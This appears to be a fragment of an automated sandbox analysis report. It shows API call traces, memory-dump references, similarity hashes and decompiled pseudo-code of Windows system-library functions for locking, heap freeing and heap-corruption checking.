0x00000000
0x6abd6c7c
0x6abd6c8a
0x6abd6c8a
0x6abd6c9d
0x6abd6ca7
0x6abd6cac
0x6abd6cb2
0x6abd6cb9
0x00000000
0x6abd6cbf
0x6abd6cbf
0x00000000
0x6abd6cbf
0x6abd6cb9
0x6ab94dfb
0x6abd6ccf
0x6abd6cd3
0x6ab94e32
0x6ab94e39
0x6abd6ce0
0x6abd6cf2
0x6abd6cf2
0x6abd6ce0
0x6ab94e3f
0x6ab94e41
0x6ab94e51
0x6ab94e51
0x6ab94e03
0x6ab94e03
0x6ab94e09
0x6ab94e0f
0x6ab94e57
0x00000000
0x00000000
0x6ab94e1b
0x6ab94e30
0x6ab94e5b
0x6ab94e5b
0x00000000
0x6ab94e30
0x6ab94e11
0x6ab94e11
0x6ab94e16
0x00000000
0x6ab94e16
0x6ab94e01
0x00000000
0x6ab94e01
0x6ab94d9e
0x6ab94da5
0x6abd6c6b
0x00000000
0x6ab94dab
0x6ab94dab
0x00000000
0x6ab94dab

APIs

memset.1105(?,00000000,000000A0,00000000,00000000,00000024), ref: 6AB94D77
RtlRunOnceExecuteOnce.1105(6AC586B0,6AB95690,00000000,00000000,00000000,00000000,00000024), ref: 6AB94D9E
ZwTraceControl.1105(0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6AB94DE9
memcmp.1105(?,6AB45138,00000010,0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6AB94E26
RtlNtStatusToDosError.1105(00000000,6AC586B0,6AB95690,00000000,00000000,00000000,00000000,00000024), ref: 6ABD6C6B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ControlErrorExecuteStatusTracememcmpmemset
String ID:
API String ID: 1949686928-0
Opcode ID: 6d6b86f30b7d69a0e10364e7f89e6bba84ccb3b6a16145609aea262ae664900c
Instruction ID: f72ab3b81be6b4d940809adffa6f1e13dd2beb8b9e84229dcfb7f96a4a2ec683
Opcode Fuzzy Hash: 6d6b86f30b7d69a0e10364e7f89e6bba84ccb3b6a16145609aea262ae664900c
Instruction Fuzzy Hash: A4413775A40798AFEB25CF24CC80F9ABBB9EF06314F0140A9E91997281DF70DD40EB95

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8C182, Relevance: 13.6, APIs: 9, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6AB8C182(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				char* _t43;
				void* _t48;
				signed char _t62;
				void* _t63;
				void* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E6AB87D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E6AC38D34(_v8, _t80);
					}
					E6AB82280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E6AB7FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t83 = _t80 + 0xd0;
						E6AC38833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E6AB7FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E6ABAB180();
						if(_a4 != 0) {
							E6AB82280(_t48, _t81);
						}
					} else {
						E6AB8BB2D(_v8 + 0xc, _t80 + 0x98);
						E6AB8BB2D(_v8 + 8, _t80 + 0xb0);
						E6AB8B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E6AB7FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							E6AB7FFB0(0, _t80, _t80 + 0x90);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					E6AB7FFB0(0, __ecx, __ecx + 0x90);
				}
				return 0;
			}

0x6ab8c18d
0x6ab8c18f
0x6ab8c191
0x6ab8c19b
0x6ab8c1a0
0x6ab8c1d4
0x6ab8c1de
0x6abd2d6e
0x6ab8c1e4
0x6ab8c1e4
0x6ab8c1e4
0x6ab8c1ec
0x6abd2d7d
0x6abd2d7d
0x6ab8c1f3
0x6ab8c1ff
0x6abd2d88
0x6abd2d8d
0x6abd2d94
0x6abd2d9f
0x6abd2da4
0x6abd2dab
0x6abd2db0
0x6abd2db2
0x6abd2db3
0x6abd2db4
0x6abd2dbc
0x6abd2dc3
0x6abd2dc3
0x6ab8c205
0x6ab8c211
0x6ab8c222
0x6ab8c22c
0x6ab8c234
0x6ab8c23a
0x6ab8c23f
0x6ab8c245
0x6ab8c24b
0x6ab8c251
0x6ab8c25a
0x6ab8c27d
0x6ab8c27d
0x6ab8c25c
0x6ab8c25c
0x00000000
0x6ab8c25e
0x6ab8c1a4
0x6ab8c1aa
0x6ab8c1b3
0x6ab8c26c
0x6ab8c26c
0x00000000

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,00000000,?,00000000,?,?,?,?,?,6AC2C9F8,000000FE), ref: 6AB8C1D7
RtlAcquireSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,?,?,?,6AC2C9F8,000000FE), ref: 6AB8C1F3
RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,6AC2C9F8,000000FE), ref: 6AB8C23A
RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,?,?,?,6AC2C9F8,000000FE), ref: 6AB8C26C
RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?,6AC2C9F8,000000FE), ref: 6AB8C27D

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$AcquireCurrentServiceSession
String ID:
API String ID: 4254861812-0
Opcode ID: bdeba0c7626f7b2223eabf048399ca84a7f51063fc420e87d18673506539e28e
Instruction ID: 432f9a74f60d69af4d3905f2dddd3dc5c559126fa963eb770a5a0bab3826faaa
Opcode Fuzzy Hash: bdeba0c7626f7b2223eabf048399ca84a7f51063fc420e87d18673506539e28e
Instruction Fuzzy Hash: 3A3116F16025C6BAD704DBB8C484BDDF764FF43208F05425AD4284B242DF79AA55F790

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9DE9E, Relevance: 13.6, APIs: 9, Instructions: 79
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6AB9DE9E(void* __ecx) {
				char _v0;
				char _v12;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v65;
				void* _v66;
				void* __ebx;
				void* __edi;
				void* _t81;
				signed int _t82;
				intOrPtr* _t92;
				signed int _t96;
				intOrPtr* _t100;
				signed int _t103;
				signed int _t104;
				intOrPtr _t109;
				intOrPtr* _t110;
				signed int _t116;
				char _t121;
				void* _t128;
				signed int* _t130;
				signed int* _t135;
				signed int _t138;
				signed int _t140;
				void* _t145;
				unsigned int _t147;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t161;
				signed int* _t162;
				char _t163;
				signed int _t164;
				signed int _t169;
				signed int _t171;
				intOrPtr* _t173;
				signed int _t176;
				signed int _t177;
				intOrPtr* _t178;
				void* _t181;
				void* _t183;
				signed int _t186;
				signed int _t188;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				void* _t196;

				_t194 = _t193 & 0xfffffff8;
				_push(__ecx);
				_push(_t173);
				_t181 = __ecx;
				_t81 = E6AB82280( *0x6ac584cc + 4,  *0x6ac584cc + 4);
				_t128 = _t181 + 0x28;
				_t82 = E6AB82280(_t81, _t128);
				asm("lock xadd [esi+0x50], eax");
				if((_t82 | 0xffffffff) != 1) {
					E6AB7FFB0(_t128, _t173, _t128);
					L8:
					return E6AB7FFB0(_t128, _t173,  *0x6ac584cc + 4);
				} else {
					if(E6AB87D50() != 0) {
						_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
					} else {
						_t92 = 0x7ffe038e;
					}
					_t173 = _t181 + 0x10;
					if( *_t92 != 0) {
						E6ABF2EA3(_t181,  *_t173,  *((intOrPtr*)(_t173 + 4)));
					}
					_push(_t173);
					E6ABAB150();
					_t96 = _t181 + 0x1c;
					_t162 =  *_t96;
					if(_t162[1] != _t96) {
						L10:
						_t145 = 3;
						asm("int 0x29");
						_t191 = _t194;
						_push(_t145);
						_push(_t145);
						_push(_t128);
						_push(_t181);
						_push(_t173);
						_t130 = _t162;
						_t183 = _t145;
						asm("lock xadd [esi+0x2c], eax");
						if((_t96 | 0xffffffff) == 1) {
							_t146 =  *((intOrPtr*)(_t183 + 0x28));
							if( *((intOrPtr*)(_t183 + 0x28)) != 0) {
								E6AB6A745(_t130, _t146, _t162, _t173);
							}
							_t100 = _t183 + 4;
							_t163 =  *_t100;
							if( *((intOrPtr*)(_t163 + 4)) != _t100) {
								L20:
								_t147 = 3;
								asm("int 0x29");
								_push(_t191);
								_t196 = (_t194 & 0xfffffff8) - 0x1c;
								_v56 = _v56 & 0x00000000;
								_push(_t130);
								 *((char*)(_t196 + 0xb)) = _t163;
								 *(_t196 + 0x18) = _t147;
								_push(_t183);
								_push(_t173);
								_t135 =  *((intOrPtr*)( *[fs:0x18] + 0x30)) + ((_t147 >> 0x00000005 & 0x0000007f) + 0x97) * 4;
								_t103 = 0;
								_t164 =  *_t135;
								_v48 = _t135;
								 *(_t196 + 0x12) = 0;
								if(_t164 != 0) {
									while((_t164 & 0x00000001) == 0) {
										_t103 = _t164;
										if((_t164 & 0x00000002) != 0) {
											asm("lock cmpxchg [ebx], ecx");
											if(_t103 != _t164) {
												goto L54;
											}
										} else {
											_t186 = _t164 | 0x00000002;
											asm("lock cmpxchg [ebx], ecx");
											if(_t103 != _t164) {
												L54:
												_t164 = _t103;
												if(_t103 != 0) {
													continue;
												} else {
												}
											} else {
												while(1) {
													L25:
													_t138 = _t186 & 0xfffffffc;
													 *(_t196 + 0x24) = _t138;
													_t176 = _t138;
													if( *((intOrPtr*)(_t138 + 0x10)) == 0) {
														goto L56;
													}
													L26:
													_t177 =  *((intOrPtr*)(_t176 + 0x10));
													 *((intOrPtr*)(_t138 + 0x10)) = _t177;
													while(_t177 != 0) {
														_t169 =  *((intOrPtr*)(_t177 + 0xc));
														_v52 = _t169;
														if( *_t177 !=  *((intOrPtr*)(_t196 + 0x20))) {
															L60:
															_t177 = _t169;
															continue;
														} else {
															_t152 =  *(_t177 + 8);
															if(_t177 != _t138) {
																 *(_t169 + 8) = _t152;
																_t153 =  *(_t177 + 8);
																_t109 =  *((intOrPtr*)(_t177 + 0xc));
																if(_t153 != 0) {
																	 *((intOrPtr*)(_t153 + 0xc)) = _t109;
																} else {
																	 *((intOrPtr*)(_t138 + 0x10)) = _t109;
																	 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xc)) + 0x10)) =  *((intOrPtr*)(_t177 + 0xc));
																}
																goto L34;
															} else {
																if(_t152 != 0) {
																	_t152 = _t152 ^ (_t152 ^ _t186) & 0x00000003;
																}
																_t116 = _t186;
																asm("lock cmpxchg [ebx], edx");
																_t138 =  *(_t196 + 0x24);
																if(_t116 != _t186) {
																	_t186 = _t116;
																	goto L25;
																} else {
																	_t171 =  *(_t177 + 8);
																	_t156 = _t152 & 0xffffff00 | _t152 == 0x00000000;
																	 *(_t196 + 0x12) = _t156;
																	if(_t171 != 0) {
																		 *(_t171 + 0xc) =  *(_t171 + 0xc) & 0x00000000;
																		 *((intOrPtr*)(_t171 + 0x10)) =  *((intOrPtr*)(_t177 + 0x10));
																		 *(_t196 + 0x12) = _t156;
																	}
																	_t169 = _v52;
																	L34:
																	_t154 = 2;
																	_t49 = _t177 + 0x14; // 0x14
																	_t110 = _t49;
																	_t155 =  *_t110;
																	 *_t110 = _t154;
																	if(_t155 == 2) {
																		goto L60;
																	} else {
																		if(_t155 == 0) {
																			 *(_t177 + 8) = _v56;
																			_v56 = _t177;
																		}
																		if( *((char*)(_t196 + 0x13)) != 0) {
																			goto L60;
																		}
																	}
																}
															}
														}
														break;
													}
													_t103 = _v56;
													if(_t103 != 0) {
														do {
															_push( *((intOrPtr*)(_t103 + 4)));
															_t188 =  *(_t103 + 8);
															E6ABA9BF0();
															_t103 = _t188;
														} while (_t188 != 0);
													}
													if( *(_t196 + 0x12) == 0) {
														_t151 =  *_v48;
														while(1) {
															_t140 = _t151 & 0x00000001;
															asm("sbb edx, edx");
															_t103 = _t151;
															asm("lock cmpxchg [esi], edx");
															if(_t103 == _t151) {
																break;
															}
															_t151 = _t103;
														}
														if(_t140 != 0) {
															_t103 = E6AC1CF30(_t103);
														}
													}
													goto L41;
													do {
														L56:
														_t104 = _t176;
														_t176 =  *(_t176 + 8);
														 *(_t176 + 0xc) = _t104;
													} while ( *((intOrPtr*)(_t176 + 0x10)) == 0);
													goto L26;
												}
											}
										}
										goto L41;
									}
								}
								L41:
								return _t103;
							} else {
								_t157 =  *((intOrPtr*)(_t100 + 4));
								if( *_t157 != _t100) {
									goto L20;
								} else {
									 *_t157 = _t163;
									 *((intOrPtr*)(_t163 + 4)) = _t157;
									_t178 =  *((intOrPtr*)(_t183 + 0x30));
									 *_t130 =  *(_t183 + 0x38);
									 *_v0 =  *((intOrPtr*)(_t183 + 0x3c));
									_t121 = RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t183);
									if(_t178 != 0) {
										 *_t178 = 1;
										_t121 =  &_v12;
										asm("lock or [eax], ecx");
										_push(0);
										L21();
									}
									goto L13;
								}
							}
						} else {
							_t121 = _v0;
							 *_t130 =  *_t130 & 0x00000000;
							 *_t121 =  *_t121 & 0x00000000;
							L13:
							return _t121;
						}
					} else {
						_t161 =  *(_t96 + 4);
						if( *_t161 != _t96) {
							goto L10;
						} else {
							 *_t161 = _t162;
							_t162[1] = _t161;
							E6AB7FFB0(_t128, _t173, _t128);
							if( *(_t181 + 0x58) != 0) {
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0,  *(_t181 + 0x58));
							}
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t181);
							goto L8;
						}
					}
				}
			}

0x6ab9dea3
0x6ab9dea6
0x6ab9deae
0x6ab9deb2
0x6ab9deb5
0x6ab9deba
0x6ab9debe
0x6ab9dec6
0x6ab9decc
0x6ab9df40
0x6ab9df2a
0x6ab9df3e
0x6ab9dece
0x6ab9ded5
0x6abdb445
0x6ab9dedb
0x6ab9dedb
0x6ab9dedb
0x6ab9dee2
0x6ab9dee7
0x6abdb456
0x6abdb456
0x6ab9deed
0x6ab9deee
0x6ab9def3
0x6ab9def6
0x6ab9defb
0x6ab9df47
0x6ab9df49
0x6ab9df4a
0x6ab9df4f
0x6ab9df51
0x6ab9df52
0x6ab9df53
0x6ab9df54
0x6ab9df55
0x6ab9df56
0x6ab9df58
0x6ab9df5d
0x6ab9df63
0x6ab9df77
0x6ab9df7c
0x6ab9dfd3
0x6ab9dfd3
0x6ab9df7e
0x6ab9df81
0x6ab9df86
0x6ab9dfda
0x6ab9dfdc
0x6ab9dfdd
0x6ab9dfe1
0x6ab9dfe7
0x6ab9dff0
0x6ab9dff5
0x6ab9dff8
0x6ab9e005
0x6ab9e00f
0x6ab9e010
0x6ab9e011
0x6ab9e014
0x6ab9e016
0x6ab9e018
0x6ab9e01c
0x6ab9e022
0x6ab9e028
0x6ab9e031
0x6ab9e036
0x6abdb47d
0x6abdb483
0x00000000
0x00000000
0x6ab9e03c
0x6ab9e03e
0x6ab9e043
0x6ab9e049
0x6abdb489
0x6abdb489
0x6abdb48d
0x00000000
0x00000000
0x6abdb493
0x00000000
0x6ab9e04f
0x6ab9e04f
0x6ab9e051
0x6ab9e054
0x6ab9e058
0x6ab9e05e
0x00000000
0x00000000
0x6ab9e064
0x6ab9e064
0x6ab9e067
0x6ab9e06a
0x6ab9e076
0x6ab9e079
0x6ab9e07f
0x6abdb4cc
0x6abdb4cc
0x00000000
0x6ab9e085
0x6ab9e085
0x6ab9e08a
0x6ab9e11c
0x6ab9e11f
0x6ab9e122
0x6ab9e127
0x6ab9e164
0x6ab9e129
0x6ab9e129
0x6ab9e12f
0x6ab9e12f
0x00000000
0x6ab9e090
0x6ab9e092
0x6abdb4b2
0x6abdb4b2
0x6ab9e09e
0x6ab9e0a0
0x6ab9e0a4
0x6ab9e0aa
0x6abdb4d3
0x00000000
0x6ab9e0b0
0x6ab9e0b0
0x6ab9e0b5
0x6ab9e0b8
0x6ab9e0be
0x6abdb4b9
0x6abdb4c0
0x6abdb4c3
0x6abdb4c3
0x6ab9e0c4
0x6ab9e0c8
0x6ab9e0ca
0x6ab9e0cb
0x6ab9e0cb
0x6ab9e0ce
0x6ab9e0ce
0x6ab9e0d3
0x00000000
0x6ab9e0d9
0x6ab9e0db
0x6ab9e0e1
0x6ab9e0e4
0x6ab9e0e4
0x6ab9e0ed
0x00000000
0x00000000
0x6ab9e0ed
0x6ab9e0d3
0x6ab9e0aa
0x6ab9e08a
0x00000000
0x6ab9e07f
0x6ab9e0f3
0x6ab9e0f9
0x6ab9e0fb
0x6ab9e0fb
0x6ab9e0fe
0x6ab9e101
0x6ab9e106
0x6ab9e108
0x6ab9e0fb
0x6ab9e111
0x6ab9e138
0x6ab9e13a
0x6ab9e13e
0x6ab9e148
0x6ab9e14e
0x6ab9e150
0x6ab9e156
0x00000000
0x00000000
0x6ab9e16c
0x6ab9e16c
0x6ab9e15a
0x6ab9e15d
0x6ab9e15d
0x6ab9e15a
0x00000000
0x6abdb498
0x6abdb498
0x6abdb498
0x6abdb49a
0x6abdb49d
0x6abdb4a0
0x00000000
0x6abdb4a6
0x6ab9e04f
0x6ab9e049
0x00000000
0x6ab9e036
0x6ab9e028
0x6ab9e113
0x6ab9e119
0x6ab9df88
0x6ab9df88
0x6ab9df8d
0x00000000
0x6ab9df8f
0x6ab9df8f
0x6ab9df91
0x6ab9df97
0x6ab9df9a
0x6ab9dfa5
0x6ab9dfb0
0x6ab9dfb7
0x6ab9dfb9
0x6ab9dfbf
0x6ab9dfc4
0x6ab9dfc7
0x6ab9dfcc
0x6ab9dfcc
0x00000000
0x6ab9dfb7
0x6ab9df8d
0x6ab9df65
0x6ab9df65
0x6ab9df68
0x6ab9df6b
0x6ab9df6e
0x6ab9df74
0x6ab9df74
0x6ab9defd
0x6ab9defd
0x6ab9df02
0x00000000
0x6ab9df04
0x6ab9df04
0x6ab9df07
0x6ab9df0a
0x6ab9df13
0x6abdb46e
0x6abdb46e
0x6ab9df25
0x00000000
0x6ab9df25
0x6ab9df02
0x6ab9defb

APIs

RtlAcquireSRWLockExclusive.1105(?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001,00000000,?,?), ref: 6AB9DEB5
RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001,00000000,?), ref: 6AB9DEBE

Part of subcall function 6AB82280: RtlDllShutdownInProgress.1105(00000000), ref: 6AB822BA
Part of subcall function 6AB82280: ZwWaitForAlertByThreadId.1105(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6AB823A3

RtlGetCurrentServiceSessionId.1105(?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001,00000000,?), ref: 6AB9DECE
ZwUnsubscribeWnfStateChange.1105(?,?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001,00000000), ref: 6AB9DEEE
RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001), ref: 6AB9DF0A
RtlFreeHeap.1105(?,00000000,?,?,?,?,?,00000000,?,00000000,?,?,6AB63A82,?), ref: 6AB9DF25
RtlReleaseSRWLockExclusive.1105(?,?,?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001), ref: 6AB9DF33
RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,00000000,?,?,6AB63A82,?,?,?,?,?,00000001,00000000), ref: 6AB9DF40
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,6AB63A82,?), ref: 6ABDB46E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$AcquireFreeHeap$AlertChangeCurrentProgressServiceSessionShutdownStateThreadUnsubscribeWait
String ID:
API String ID: 3923771875-0
Opcode ID: 4f3c96429bf1d9a98adf347f95fe6170224f053c3bbff49e7995bf65fe4c165c
Instruction ID: 6f15e67539e0d287c69160bbcd7ad959709d406a542c4b2c772f7a6dfc09300d
Opcode Fuzzy Hash: 4f3c96429bf1d9a98adf347f95fe6170224f053c3bbff49e7995bf65fe4c165c
Instruction Fuzzy Hash: DF21D3722466C09BC7209B39C848F1ABBB9EF0235CF0145A9E4149B662DF74E841EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AC123E3, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E6AC123E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x6ac5874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x6ac5874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E6ABBD4F0(_t83, 0x6ab46c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E6AB6B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6ac56378 = 1;
						asm("int3");
						 *0x6ac56378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x6ac123e3
0x6ac123e8
0x6ac123eb
0x6ac123ee
0x6ac123f3
0x6ac1259b
0x6ac1259b
0x6ac1259d
0x6ac125a3
0x6ac125a3
0x6ac123fb
0x6ac12424
0x6ac1244f
0x6ac12460
0x6ac12451
0x6ac12451
0x6ac12456
0x6ac12458
0x6ac12458
0x6ac1245b
0x6ac1245b
0x6ac12426
0x6ac12431
0x6ac12436
0x6ac12443
0x6ac12438
0x6ac12438
0x6ac12438
0x6ac12445
0x6ac12445
0x6ac12463
0x6ac12469
0x6ac1246f
0x6ac12480
0x6ac12495
0x6ac124a1
0x6ac124ce
0x6ac124df
0x6ac124d0
0x6ac124d0
0x6ac124d5
0x6ac124d7
0x6ac124d7
0x6ac124da
0x6ac124da
0x6ac124a3
0x6ac124b0
0x6ac124b5
0x6ac124c2
0x6ac124b7
0x6ac124b7
0x6ac124b7
0x6ac124c4
0x6ac124c4
0x6ac124e8
0x6ac12497
0x6ac1249a
0x6ac1249a
0x6ac12482
0x6ac12488
0x6ac12488
0x6ac12471
0x6ac12479
0x6ac12479
0x6ac124ef
0x6ac123fd
0x6ac12401
0x6ac12412
0x6ac12403
0x6ac12403
0x6ac12408
0x6ac1240a
0x6ac1240a
0x6ac1240d
0x6ac1240d
0x6ac1241b
0x6ac1241b
0x6ac124f1
0x6ac124f6
0x6ac12507
0x6ac12510
0x00000000
0x6ac12510
0x6ac1250b
0x00000000
0x6ac124f8
0x6ac124f8
0x6ac124fc
0x6ac12500
0x6ac12512
0x6ac12515
0x6ac1251a
0x6ac12521
0x6ac12524
0x6ac12529
0x6ac1252f
0x00000000
0x00000000
0x6ac1253c
0x6ac1255c
0x6ac12561
0x6ac1253e
0x6ac12554
0x6ac12559
0x6ac1256a
0x6ac1256d
0x6ac12574
0x6ac12586
0x6ac12588
0x6ac1258f
0x6ac12590
0x6ac12590
0x6ac12597
0x00000000
0x6ac12597

APIs

RtlCompareMemory.1105(-00000010,6AB46C58,00000008,?,-00000018,?,?,?,6AC24BD7), ref: 6AC12524
DbgPrint.1105(HEAP[%wZ]: ,-0000002C,-00000010,6AB46C58,00000008,?,-00000018,?,?,?,6AC24BD7), ref: 6AC12554
DbgPrint.1105(HEAP: ,-00000010,6AB46C58,00000008,?,-00000018,?,?,?,6AC24BD7), ref: 6AC12561
DbgPrint.1105(Heap block at %p modified at %p past requested size of %Ix,-00000018,?,?,-00000010,6AB46C58,00000008,?,-00000018,?,?,?,6AC24BD7), ref: 6AC12574

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 6AC1256F
HEAP[%wZ]: , xrefs: 6AC1254F
